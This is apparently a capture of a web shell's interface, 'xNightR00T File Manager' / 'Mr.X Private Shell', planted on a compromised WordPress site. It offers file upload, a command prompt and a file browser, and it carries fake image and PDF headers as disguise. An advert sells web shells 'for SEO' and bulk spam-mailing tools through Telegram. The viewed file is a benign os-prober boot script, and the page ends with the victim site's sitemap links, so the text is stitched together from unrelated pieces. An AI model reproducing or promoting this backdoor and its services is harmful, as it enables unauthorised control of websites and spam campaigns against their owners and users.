xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/bin/sh
# Sub-tests that require a mounted partition.
. /usr/share/os-prober/common.sh
set -e

partition="$1"

types="$(fs_type "$partition")" || types=NOT-DETECTED
if [ "$types" = NOT-DETECTED ]; then
	debug "$1 type not recognised; skipping"
	exit 0
elif [ "$types" = swap ]; then
	debug "$1 is a swap partition; skipping"
	exit 0
elif [ "$types" = crypto_LUKS ]; then
	debug "$1 is a LUKS partition; skipping"
	exit 0
elif [ "$types" = ntfs ]; then
	if type ntfs-3g >/dev/null 2>&1; then
		types='ntfs-3g ntfs'
	fi
elif [ -z "$types" ]; then
	if type cryptsetup >/dev/null 2>&1 && \
	   cryptsetup luksDump "$partition" >/dev/null 2>&1; then
		debug "$1 is a LUKS partition; skipping"
		exit 0
	fi
	types="$(grep -v nodev /proc/filesystems)"
fi

tmpmnt=/var/lib/os-prober/mount
if [ ! -d "$tmpmnt" ]; then
	mkdir "$tmpmnt"
fi

mounted=
if type grub2-mount >/dev/null 2>&1 && \
   type grub2-probe >/dev/null 2>&1 && \
   grub2-mount "$partition" "$tmpmnt" 2>/dev/null; then
	mounted=1
	type="$(grub2-probe -d "$partition" -t fs)"
	[ "$type" ] || type=fuseblk
else
	ro_partition "$partition"
	for type in $types; do
		if mount -o ro -t "$type" "$partition" "$tmpmnt" 2>/dev/null; then
			mounted=1
			break
		fi
	done
fi

if [ "$mounted" ]; then
	linux_mount_boot "$partition" "$tmpmnt"
	bootpart="${mountboot%% *}"
	mounted="${mountboot#* }"

	for test in /usr/lib/linux-boot-probes/mounted/*; do
		if [ -f "$test" ] && [ -x "$test" ]; then
			debug "running $test $partition $bootpart $tmpmnt $type"
			if $test "$partition" "$bootpart" "$tmpmnt" "$type"; then
				debug "$test succeeded"
				umount "$tmpmnt/boot" 2>/dev/null || true 	
				if ! umount "$tmpmnt"; then
					warn "failed to umount $tmpmnt"
				fi
				rmdir "$tmpmnt" || true
				exit 0
			fi
		fi
	done

	umount "$tmpmnt/boot" 2>/dev/null || true 	
	if ! umount "$tmpmnt"; then
		warn "failed to umount $tmpmnt"
	fi
fi

rmdir "$tmpmnt" || true

# No tests found anything.
exit 1

Filemanager

Name Type Size Permission Actions
mounted Folder 0755
50mounted-tests File 1.91 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml